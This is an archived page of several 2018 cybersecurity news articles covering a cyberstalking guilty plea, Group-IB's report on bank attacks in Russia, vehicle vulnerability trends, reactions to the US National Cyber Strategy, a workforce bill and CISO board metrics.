- Cyber -

Last update 09.10.2017 12:44:39

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6



Ex-NASA Contractor Pleads Guilty in Cyberstalking Scheme
14.10.2018 securityweek
Cyber
A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has pleaded guilty to federal charges.

Twenty-eight-year-old Richard Bauer of Los Angeles entered pleas Thursday to stalking, computer hacking and aggravated identity theft.

Bauer acknowledged victimizing friends, family members, high school and college acquaintances and co-workers.

Bauer, pretending to ask questions on Facebook for a class, got some victims to reveal information he used to reset their online passwords and harvest photos. He got other victims to install computer malware allowing him to access their computers.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.


Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks
10.10.2018 securityaffairs
Cyber

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector
Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups, however stolen money — is not the most dangerous thing that could happen to a financial organization”, — says Ilya Sachkov, Group-IB CEO and founder. “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies, however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted at attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend aimed at reducing threats from banking Trojans for PCs has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and companies executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users, however in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in the damage among customers can be explained by banks and payment systems introducing technologies for early fraud detection that use behavioral analysis algorithms, allowing to detect attacks, that combine social engineering scams phishing, botnets, illegal money withdrawal networks and fraud across multiple channels and other types of banking fraud on all customer devices and platforms

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest amount of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

“Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”


Researchers See Improvements in Vehicle Cybersecurity
27.9.2018 securityweek
Cyber

Data from vulnerability assessments conducted by security consulting firm IOActive in the past years shows some improvements in vehicle cybersecurity.

Since 2013, IOActive has spent thousands of hours every year analyzing vehicle cybersecurity, and the company has published several research papers on this topic. A report made available in 2016 showed that half of the flaws found at the time had an impact level of critical (25%) or high (25%).

The company describes critical vulnerabilities as issues that have an “extreme impact” on a vehicle if exploited, they would likely receive media attention, and are almost certain to be exploited. High severity flaws have a “major impact,” they could represent a regulatory violation, and they are relatively easy to find and exploit even by a less skilled attacker.

IOActive on Tuesday published a follow-up report to the one from 2016. The latest data, collected in 2016 and 2017, shows that only 10% of the vulnerabilities were critical and 23% were high in terms of impact.

Impact rating of car vulnerabilities

“Critical-impact vulnerabilities have decreased 15 percentage points, while the distribution of medium-and low-impact vulnerabilities has increased. This is likely the result of better security awareness and user separation. We’ve seen significant growth in the design of vehicle systems to incorporate security from the start. This includes making sure that the processes that handle data are running with limited privileges, which helps lower the impact of the most likely attacks,” IOActive said in its latest report.

In terms of likelihood of exploitation, the percentage of critical flaws has increased from 7% to 11%, and the percentage of high severity flaws has decreased from 21% to 17%. However, a majority of the detected security holes fall in the medium or low likelihood categories, which means they are not easy to exploit or they require another vulnerability for exploitation.

“We’ve seen security architecture improve significantly but we’ve also seen an expansion in the number and scope of remote services that could be leveraged to attack the system,” IOActive said.

There have also been significant improvements in terms of overall risk posed by vulnerabilities. Six percent of the flaws discovered in 2016 and 2017 were assigned a critical risk rating and 22% a high risk rating. In comparison, the previous report classified 22% of flaws as critical and 18% as high risk.

As for attack vectors, which IOActive says are useful for determining how an attacker could target a system, the latest report shows that the most common vectors for the vulnerabilities discovered by the company are local access and network access. There has also been a significant increase in flaws that can be exploited over a serial connection, which requires physical access to the device.

“The large increase in local and serial attacks can be attributed to a shift in testing approaches. As security has become a more prevalent concern, more companies are providing documentation and debugging access to help identify vulnerabilities inside their systems. The automotive industry is also taking more of an interest in lower-level security features, like secure boot, which is reflected in the areas we end up testing,” researchers said.

The most common types of vulnerabilities identified in the latest report are coding logic errors (26%), memory corruptions (16%), privilege issues (14%), and information disclosure bugs (12%).

IOActive’s analysis shows that a majority of flaws, 59% require low-effort fixes and only 12% are difficult to patch.


Industry Reactions to New National Cyber Strategy
24.9.2018 securityweek
Cyber

Industry Reactions to United States 2018 National Cyber Strategy

The White House last week announced the release of the 2018 National Cyber Strategy, which outlines the government’s plans for ensuring the security of cyberspace.

Described by officials as the “first fully articulated cyber strategy in 15 years," the new strategy describes how the current administration plans on protecting the country against cyber threats and strengthening the United States’ cyber capabilities.

The strategy shows that the U.S. is prepared to take a more aggressive posture, which includes an offensive response against nations engaging in cyber activity aimed at the country. Officials warned that the government’s response to a cyberattack may not necessarily be in the cyber world.

Industry professionals contacted by SecurityWeek commented on various aspects of the new strategy, pointing out its benefits, shortcomings, and the unanswered questions it raises.

And the feedback begins...

Dave Weinstein, VP of Threat Research at Claroty:

“Most government strategy documents tend to be underwhelming and this one is no different. This isn't a whole lot of new content or ideas, but rather amplification, clarification, and renewal of previous ones.

The paragraph that stands out to me is the one on the Cyber Deterrence Initiative. Until now we haven't formally adopted an international approach to deterrence, which includes collaborating on incident response and attribution. This Initiative has enormous potential to be successful if the right nations formally participate and equally contribute to its cause. I would expect to see the Five Eyes join in but it should extend even further, beginning with NATO member-states.

Another one that stands out to me and is much overdue is modernizing of surveillance and computer crime laws. The Computer Fraud and Abuse Act (CFAA) in particular is in desperate need of a refresh.

On critical infrastructure, it's encouraging to see it featured so prominently in the Strategy but the substance is a bit lacking. More creativity is needed for government to maximize its contributions to what is largely a private sector problem. Some of the best ways for government to "secure critical infrastructure" is to incentive investment in technology, people, and training; share actionable threat intelligence; and deter activities that hold infrastructure assets (and the citizens they serve) at risk. Again, some of these are mentioned but not in great detail.

Would've like to see a bit more emphasis on state and local cybersecurity and a key component of the national strategy.

They punted on encryption -- would've like to see them take a strong stance on encryption while committing to foster a dialogue between the public and private sector recognizing the real concerns of law enforcement and the national security establishment.

Was struck by the explicit mention of transportation and maritime cybersecurity -- would've thought energy and maybe even advanced manufacturing would have received similar attention (especially given the Administration's domestic policy priorities).”

Nathan Wenzler, chief security strategist at AsTech:

“Politicizing matters of cybersecurity only serves as a detriment to us all. Nearly every human on this planet is served in some way, shape or form by technology and the various forms of communication and information delivery, and taking security seriously and promoting it consistently is critical to safeguard the access to information for all of us going forward. However, this Cyber Security Strategy document released by the White House does not do much of anything to serve this purpose on its own account, and even more so when viewed alongside with other security-related matters that this administration has weighed in on. For example, Pillar IV of the White House's plan states that "The United States stands firm on its principles to protect and promote and open, interoperable, reliable and secure internet." Yet, this comes from the same administration whose FCC has killed Net Neutrality and arguably has laid the groundwork for the exact opposite thing taking place. Pillar III discusses addressing the interference of foreign powers executing propaganda and other counter-intelligence campaigns against the United States, yet we've witnessed repeated efforts from this administration to stop efforts to do exactly that in several situations, including the influencing of voters during the last major election cycle. Ultimately, this strategy document strikes me as nothing more than hyperbole, or as a distraction from the contrary actions this administration has already taken that nullify most of the principles outlined here.

Perhaps the most troubling part of this is the change in tone from looking to bolster the cybersecurity defenses of the United States, including the hiring and retaining of qualified information security professionals to raise the overall cybersecurity capabilities of government agencies, to one of aggression and taking an offensive stance against those deemed to be enemies of the state. It's a short collection of statements buried in the strategy, but National Security Advisor Tom Bolton has already confirmed that executing more counterattacks and taking this more aggressive and offensive position is the intent. This is, in my opinion, and incredibly dangerous strategy to take, especially when it comes to cyberwarfare initiatives. It's simply too easy for conflicts to escalate, and it does not require huge armies or massive amounts of money or government support for a malicious actor to do incredible damage from a technological perspective. A single actor could, potentially, take down power grids or even impair the internet itself (look at the attacks against the root DNS servers in years past as an example). Escalating conflicts in cyberspace is not the same as on bringing a huge show of military force to a conventional battlefield, and it is with this mindset that the current administration appears to be working from, demonstrating a lack of understanding of what we are collectively facing from a cybersecurity perspective and of the risk involved in performing acts of aggression in this arena.”

Sherban Naum, SVP of Corporate Strategy and Technology for Bromium:

“The Strategy is a policy vehicle. The key concern is once the strategy has been fully executed, it must drive acquisition in a timely fashion to be effective. What funding vehicle will support implementing the actual cyber tools necessary to deliver on the policy changes? Who will drive the acquisitions? Will they be consolidated under a single OSD mandate and funding action, coalescing all funding to a single activity or will OSD mandate the changes, leaving the services to both fund and implement? If the later, how will the mandate compete with other necessary funding efforts, considering the sheer volume of legacy infrastructure in place today under sustainment? Are there technologies that have been vetted of recent that have proven to deliver vastly new capabilities that satisfy both defensive protection-first while delivering the threat telemetry needed to take offensive action based on clear attribution? The DoD has been unsuccessful to implement clear and agile acquisition changes despite the many years as a stated goal.

I’m not sure accepted international rules of engagement in kinetic warfare translate equally to that in cyber space. In kinetic warfare there are clearly defined rules of engagement, both Federal Defense policy as well as International governing bodies, and these rules need to be better defined in the cyber world. The specific call out for international consensus and support is paramount. Modern Cyber Warfare may come down to the creation of a Cyber “NATO-like” body that acts both as a unifying body toward response and a deterrent to nation state attackers. Attack one, attack all.”

Bryson Bort, Founder & CEO of SCYTHE:

“This is the most comprehensive cybersecurity strategy document ever published—firmly stating a vision of the United States as ensuring a secure Internet by cooperation or force. It reads like a response to former NSA Director Admiral Mike Rogers’ February Congressional testimony where he acknowledged current constraints in responding to the active threat landscape the US faces.

The ambitious scope is easily reflected in a just few stand out items: replacing social security numbers for identify management; addressing IOT security through the full lifecycle, although not post-deployment; a global “Cyber Deterrence Initiative” to strength partner law enforcement and information sharing capabilities; and the promise of “swift and transparent consequences” to deter attacks.

The message appears to be: you will see an American Flag planted on your scorched computer(s).”

Ali Golshan, CTO and co-founder at StackRox:

“While the new Trump administration cyber policy is not a major deviation from President Obama's initiative in 2016, the focus now is on enabling agencies – specifically the Defense Department - to respond more quickly to cyber threats. Under the Obama cyber policy, various defense and intelligence agencies were required to coordinate offensive cyber operations to ensure they had no impact on government operations. The Trump policy allows organizations to respond without cross-agency coordination.

Unlike traditional warfare, where exposing one's arsenal deters an adversary, in cyber offenses, capabilities are kept confidential so as to not reveal capabilities. Historically, this approach has been a more effective deterrent. Considering the nature of cyber weapons and the ability to reuse them once discovered, as well as the difficulty of accurate attribution (accurately determining the attacker/location/country), one could argue that responding without cross-agency coordination brings higher risk.”

Jack Jones, Co-Founder and Chief Risk Scientist at RiskLens:

“As a high level statement of intent/direction, it seems fine. In order to make it actionable though, several things have to happen:

Organizations who want (or have) to follow this directive need to be able to accurately determine where they stand relative the sobjectives described in this document.
Then, for each sub-objective within this directive, they have to prioritize the gaps between where they are and where they need to be — and prioritization is invariably a function of measurement (risk measurement in this case).
Then they have to compare the various options for closing any gaps (the most important gaps first, of course) to ensure that the most cost-effective remediations are chosen. These comparisons also are dependent on accurate risk measurement.
As these efforts get underway, cybersecurity organizations need to be able to adjust intelligently to changes in the landscape that might alter priorities or solutions. This, too, requires risk measurement.

Of course, nowhere in here is there any explicit reference to improving the profession’s ability to measure risk — even though the success of everything else is dependent on it to some degree and it is one of the most deficient areas in the profession. This reflects continued ignorance on a fundamental element of risk management.”

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“The new Strategy appropriately builds on the work of past Administrations. Particularly when read in conjunction with the DOD Cyber Strategy also released this week, the National Cyber Strategy also recognizes that going on offense is becoming more critical to playing daily cyber defense.

The Strategy has a few notable points as to protecting critical infrastructure. First, the Strategy emphasizes leveraging information and communications technology providers to detect, prevent and mitigate risk at the system level. Second, it prioritizes improved cybersecurity in the transportation industry, particularly maritime transportation. This is particularly noteworthy in light of last year’s NotPetya cyberattack, which significantly affected such transportation companies as Maersk and Federal Express. Third, the Strategy falls short in addressing election cybersecurity by throwing up state and local election control as a seemingly insurmountable obstacle.

The Strategy also recognizes that we have a long way to go in combating international cybercrime. It notes that some criminal groups now rival nation state actors in sophistication, and that rampant, technology-facilitated intellectual property theft is having a potentially deleterious effect on our long-term economic and national security. The Strategy appropriately prioritizes incident reporting and response, updating legal tools for the investigation and prosecution of technology-facilitated crimes, apprehending and successfully prosecuting more international cybercriminals, and helping other nations implement similar strategies.”

David Ginsburg, Vice President of Marketing at Cavirin:

“In one way this is helping to further codify and bring into the open actions that the US are already taking. For example, the cyber-attacks against North Korea’s missiles, as described in Woodward’s ‘Fear.’ As a public document, it also serves notice that the our responses will be on-par with approaches already taken by our adversaries. In doing this, I don’t think there is a danger of unnecessary escalation. However, we must balance our offensive capabilities with maintaining a more effective cyber posture within the various government agencies. We’ve read all too often about oversights due to lack of training, automation, or adoption of best practices. And, the strategy document is very timely given documented threats against this November’s election.”

Rick Moy, Chief Marketing Officer at Acalvio:

“This is a fairly broad and comprehensive strategy, that touches on everything from government supply chain, critical infrastructure, and democratic institutions all the way to space. While the devil will be in the details of executing this, there is a good range of priorities, including emphasis on streamlining civilian cybersecurity responsibilities, risk and vulnerability management, improving incident response. Of particular interest will be the efforts to deter attackers and ultimately hold them responsible through state-level sanctions and extradition.”

Rishi Bhargava, Co-founder at Demisto:

“One facet of this strategy that has the potential for long-lasting consequence is the US government’s commitment to develop a superior cybersecurity workforce. Today’s industry truth is that security professionals are tough to hire, train and retain. A government-led approach to expand educational opportunities and encourage re-skilling of workers will help build the talent pipeline and lead to better staffed organizational security departments. Security teams are overworked and will need all the help they can get.”


New Bill Aims to Address Cybersecurity Workforce Shortage
18.9.2018 securityweek
Cyber

A bill introduced last week by U.S. Rep. Jacky Rosen (D-Nev.) aims to address the cybersecurity workforce shortage through a grant for apprenticeship programs.

The new bill, called the Cyber Ready Workforce Act, is inspired by Nevada’s recently introduced cybersecurity apprenticeship program. This new piece of legislation would help establish a program within the Department of Labor for awarding grants, on a competitive basis, to workforce intermediaries.

The goal is to create, implement and expand cybersecurity apprenticeship programs. Apprentices will benefit from support services that include career counseling, mentorship, and assistance with housing, transportation and child care costs.

Programs eligible for grants can include ones providing technical instruction, workplace training, and certifications for support specialists, support technicians, programmers, cybersecurity specialists, and system analysts.

“The demand for talent in cybersecurity is sky-high, and we’re putting ourselves at risk if we don’t address this shortage in our workforce,” said Congresswoman Rosen. “I’m committed to ensuring that businesses and government have the skilled people and critical tools they need to enhance our nation’s cybersecurity infrastructure, help industry thrive, and strengthen our national security. Everything we do in today’s economy is shaped by technology, and I will continue to work with my House colleagues to ensure our families and communities are better protected against cyber threats.”

The initiative is backed by several lawmakers in Massachusetts and New York, and organizations such as the CompTIA tech association and The Learning Center.

“Investing in and expanding our cybersecurity workforce doesn’t only fuel our economy, it keeps us safe,” said Congressman Seth Moulton. “While I was fighting on the ground in Iraq, Al-Qaeda was fighting us on the internet — and they were beating us online! And while we focused on Russia’s military in 2016, they attacked us through the internet. This bill is an important first step towards making sure we don’t get ourselves into such a vulnerable position again.”

The bill introduced by Rep. Rosen, who is a member of the House Armed Services Committee and the Congressional Cybersecurity Caucus, cites NIST’s CyberSeek, which shows that there are more than 300,000 cybersecurity job openings at the moment.


CISOs and the Quest for Cybersecurity Metrics Fit for Business
18.9.2018 securityweek
Cyber

Never-ending breaches, ever-increasing regulations, and the potential effect of brand damage on profits has made cybersecurity a mainstream board-level issue. It has never been more important for cybersecurity controls and processes to be in line with business priorities.

A recent survey by security firm Varonis highlights that business and security are not fully aligned; and while security teams feel they are being heard, business leaders admit they aren't listening.

The problem is well-known: security and business speak different languages. Since security is the poor relation of the two, the onus is absolutely on security to drive the conversation in business terms. When both sides are speaking the same language, aligning security controls with business priorities will be much easier.

Well-presented metrics are the common factor understood by both sides and could be used as the primary driver in this alignment. The reality, however, is this isn’t always happening

Using metrics to align Security and Business

SecurityWeek spoke to several past and present CISOs to better understand the use of metrics to communicate with business leaders: why metrics are necessary; how they can be improved; what are the problems; and what is the prize?

Demolishing the Tower of Babel

“While some Board members may be aware of what firewalls are,” comments John Masserini: CISO at Millicom Telecommunications, “the vast majority have no understanding what IDS/IPS, SIEMs, Proxies, or any other solution you have actually do. They only care about the level of risk in the company.”

CISOs, on the other hand, understand risk but do not necessarily understand which parts of the business are at most risk at any time. Similarly, business leaders do not understand how changing cybersecurity threats impact specific business risks.

The initial onus is on the security lead to better understand the business side of the organization to be able to deliver meaningful risk management metrics that business leaders understand. This can be used to start the process for each side to learn more about the other. Business will begin to see how security reduces risk, and will begin to specify other areas that need more specific protection.

The key and most common difficulty is in finding and presenting the initial metrics to get the ball rolling. This is where the different ‘languages’ get in the way. “The IT department led by the CIO typically must maintain uptime for critical systems and support transformation initiatives that improve the technology used by the business to complete its mission,” explains Keyaan Williams, CEO at CLASS-LLC. “The Security department led by the CISO typically must maintain confidentiality, integrity, and availability of data and information stored, processed, or transmitted by the organization. These departments and these leaders tend to provide metrics that focus on their tactical duties rather than business drivers that concern the board/C-suite.”

Drew Koenig, consultant and host of the Security in Five podcast, sees the same basic problem. “In security there tends to be a focus on the technical metrics. Logins, blocked traffic, transaction counts, etc... but most do not map back to business objectives or are explained in a format business leaders can understand or care about. Good metrics need to be tied to dollars, business efficiency shown through time improvements, and able to show trending patterns of security effectiveness as it relates to the business. That's the real challenge.”

Williams sees the problem emanating from a lack of basic business training in the academic curriculum that supports IT and security degrees. “The top management tool in 2017 was strategic planning,” he said. “Strategic planning is often listed as one of the top-five tools of business leaders. How many security leaders understand strategic planning and execution enough to ensure their metrics contribute to the strategic initiatives of the organization?”

It is not up to the business leaders to learn about security. “The downfall for many CISOs in the past is believing that business needs to understand security,” adds Candy Alexander, a virtual CISO and president-elect of ISSA. “That is a mistake, because security is our job. We need to better understand the business, so that we can articulate the impact of not applying appropriate safeguards. The key to this whole approach is for the CISO to understand the business, and to understand the mission and goals of the business.”

Is it worth the effort?

With no exception, the CISOs SecurityWeek spoke to believe that better presentation of the right security metrics will help align security and business. In fact, comments Alexander, “It is the only way CISOs can get executive management to understand what the challenges are and what the successes have been.”

That doesn’t make it any easier. Apart from metrics and the security /business dynamic, CISOs must also understand the psychology of the boardroom – and that will vary from company to company. “Some boards care greatly about security, and others have little interest,” comments Daniel Miessler, director of client advisory services at IOActive. “If, for example, the business is being crushed by a competitor, having nothing to do with security, then it could be (but not always) that security is justifiably a lower priority to the board.”

Timing thus becomes an issue over which the CISO may have little control. Should metrics presentations be regular or given only when necessary. The former may unnecessarily take up the business leaders’ time, while the latter will paint the CISO as the bringer of doom.

Tomas Honzak, CISO at GoodData, feels that reporting should be rare. “The board should not be hearing about security on a regular basis,” he told SecurityWeek. “Unless there is a critical issue or significant business transformation, an annual presentation of the key trends, evolution of the threat landscape and strategic security plans are all that the board should be receiving from security.”

This is a minority view. Many CISOs at least imply that metrics reporting should be delivered sufficiently frequently to be able to show trends.

And then there’s style. Having got the opportunity to present to business leaders, it is very important that it is not wasted. “Many reports are like some presenters – single toned and boring,” comments Steven Lentz, head of security at Mojio and former CSO at Samsung Research America. “The report is either too long (too much detail) or too much fluff. If the report is not good it will simply cause more questions to be asked.”

The solution, he suggests, is that CISOs need be a sales and marketers as well as a security experts. The presentation itself must be like a good CV, able to capture attention within the first few sentences and maintain interest through the duration. Critically, he adds, “The report will answer questions rather than having the board question the report.”

This is key and strikes at the very core of metrics reporting. If the purpose is to say, ‘look how good your security team is’, or to highlight a new problem that needs more budget, then you should expect queries. But if the purpose is to align your security with business priorities then the metrics need to be more self-explanatory. They can be provocative, to provoke comment and discussion with and from the business leaders, but they should not elicit queries on the reporting itself.

Are CISOs delivering adequate metrics to the board?

Asked if CISOs are currently delivering good metrics, the answer was an unequivocal yes and no, maybe, it depends, but probably not.

Metrics reporting is a classic chicken and egg problem. To deliver good metrics, the CISO must understand what the business leaders want; but understanding this want comes through aligning security and business through delivering effective security metrics.

Ideally, the CISO should already be at the level of the C-Suite. “A critical enabler delivering business-centric metrics is that the security function is not simply reporting up into the C-suite but is instead being part of that level,” suggests Raef Meeuwisse, a CISO consultant and author of Cybersecurity for Beginners. “Only where security is engaged and involved in the highest levels of the business can any organization hope that their security approach, including what is measured and reported, will reflect a deep understanding of the business strategy, direction and needs.”

That, sadly, is rarely possible. “Unfortunately, the governance crisis continues,” explains Tom Kellermann. chief cybersecurity officer at Carbon Black, “as most CISOs still report to CIOs. Your defensive coordinator is reporting to your offensive coordinator.” What the CIO is often most interested in learning (how often security has prevented downtime) is not the same as what security should be reporting to business (such as how, why, and by how long dwell time has been reduced).

Poor metrics is more common than no metrics. “For example, I see many security programs that report on the number of threats blocked by security tools because the logs are easy to parse. It is a bonus that the volume of blocked threats sounds impressive. Unfortunately, this data rarely informs the business decisions that concern the board/C-suite.”

Do vendors help with producing metrics from their applications?

It would help if vendors produced readymade presentable metrics as part of their application reporting capabilities. Some are trying. “With a resurgence of interest in quantifying one’s security posture, vendors are looking more to provide this across different parts of the hybrid infrastructure,” explains Anupam Sahai, VP of product management at Cavirin. “This is also a major initiative by service providers and MSSPs. The Verizon Risk Report is a good example.”

Not all vendors agree. “This is not a vendor issue,” said Chris Morales, head of security analytics at Vectra.

Cybersecurity Metrics“The issue is whether or not there is solid alignment between the metrics that security wishes or needs to use and the information that the board requires,” explains Steve Durbin, MD of the Information Security Forum. His concern is that applications usually generate a high volume of detailed statistics that require significant processing (normalization, aggregation and analysis) before they can be interpreted and presented to the board.

The metrics presented to the board, he continued, “should convey details relating to targets of particular interest to each audience, and be clear, concise and limited in number (often four or five).”

Chris Key, CEO and co-founder of Verodin, goes further. “Relying on a vendor to provide meaningful metrics on the effectiveness of the control they sold you is like having the fox watch the hen house. Additionally, no single vendor's control represents the effectiveness of an organization’s full cybersecurity strategy.”

Less bluntly, Meeuwisse explains, “Vendors have a tough time because they are usually being squeezed on price, often asked for their security metrics in a different format for each customer and can be trying to achieve security on a smaller budget than many of their customers. As someone who has audited tens of different suppliers in my time, I almost always find substantial gaps. Most vendors show an increasing willingness to provide security metrics, but my own experience is those metrics, when available, are usually carefully crafted to avoid displaying any real issues.”

“Some vendors require log aggregation to a separate reporting server running its own analytics software, which can be an expensive and complex solution,” comments Heather Paunet, VP of product management at Untangle. “Additionally, some vendors only offer very high-level, canned reports that don't enable administrators to drill down on specific issues, limiting their usefulness.”

For board-level metrics, analytics data must often be combined with some sort of cost-benefit analysis, something that few vendors provide out-of-the-box. “It's important,” she suggests, “that security teams select vendors who provide database-driven reporting that can be easily customized to fit their needs.”

The consensus is that vendors can and should provide raw data on their product performance, but the CISO will always need to collect, correlate, analyze and present the right metrics in the right form in a manner that directly relates to the interests and concerns of business leadership.

What makes a good metric?

This all begs the question: what makes good metrics that are relevant to business leaders and can be used to further the alignment of security and business?

“Transforming security metrics into business information requires a change in focus and reporting format,” claims Williams. “Businesses measure progress and performance using scorecards, monthly or quarterly business reviews, and KPIs. Any security metrics provided to the business need to contribute to the performance measures that the business is already conducting. Providing security information that answers business questions is far superior to providing technical information and log details that have no relationship to business goals and objectives.”

“I like the old cliché that metrics need to be SMART – Specific, Measurable, Accurate, Reliable and Timely,” suggests Martin Zinaich, information security officer at the City of Tampa, Florida. “If done properly metrics can help align the Security Office to the Business and vice versa.”

He likes to keep things simple but informative. “Using standard Red/Yellow/Green indicators can quickly show the board alignment to risk, compliance and governance. Graphs can be leveraged to show risk reduction over time and overall framework alignment. Quad charts can quickly show top risks, issues requiring management attention, any major incidents and relevant projects in-flight. The goal is to be informative but brief, not technical, but statistical and aligned for a business/infosec synergic relationship.”

Sahai agrees that simple is best. “Consider the FICO score,” he says. “So, a single metric, say on a scale of 0 (worst) to 100 (best), that reflects a combination of the organization’s security and compliance posture.” The devil, of course, is in the detail. “If you look at how hackers infiltrate and compromise an organization, a score may be developed using the same approach. You first discover and classify resources, both on-prem and in the cloud, and assess threats against them, both internal and external. Based on this assessment, you identify any weaknesses and then evaluate the resources against any controls in place.”

The result, he continued, “is an overall score that reflects the organization’s current cyber posture. Correcting identified weaknesses will raise the score. Additional elements that go into scoring may include the likelihood of the breach and the projected impact. This latter point can map to the CIA model – confidentiality, integrity, and availability.”

Trends are important. “Can you provide month-over-month statistics of how each business unit has reduced the inherent risk across the company because the average time to patch has decreased significantly?” asks Masserini. “Those are the types of metrics the Board cares about, not how many attacks the firewall blocked, or how many patches are missing across the entire infrastructure, or any other ‘frighten them with huge numbers’ type metrics.”

Those huge numbers may be relevant to infosec at the operational level, says Bonney. But, he adds, “At the board level, it’s fundamentally speaking the board’s language – the board has a fiduciary duty to protect the business and keep it a going and growing concern. Align the metrics you report to the board with these goals. Deliver the metrics in terms they understand – impact on the business not impact on or of the technology – and make sure they know what the ask is. Never leave a board meeting without making the ask.”

Lentz also agrees that reporting must be continuous, with trends rather than static points in time. “I believe you also need to do a trend report,” he said. “In other words, over time – say month to month – showing a year. This way the board can clearly see wins, improvements, and areas of concern that need addressing. A clear visual presentation and roadmap so the board can grasp rather than look confused.”

Morales goes deeper and offers specific metrics to include: dwell time, lateral movement, reinfection, network coverage and response time.

Miessler and Kellermann show how these issues can be combined and worked into business-centric metrics.

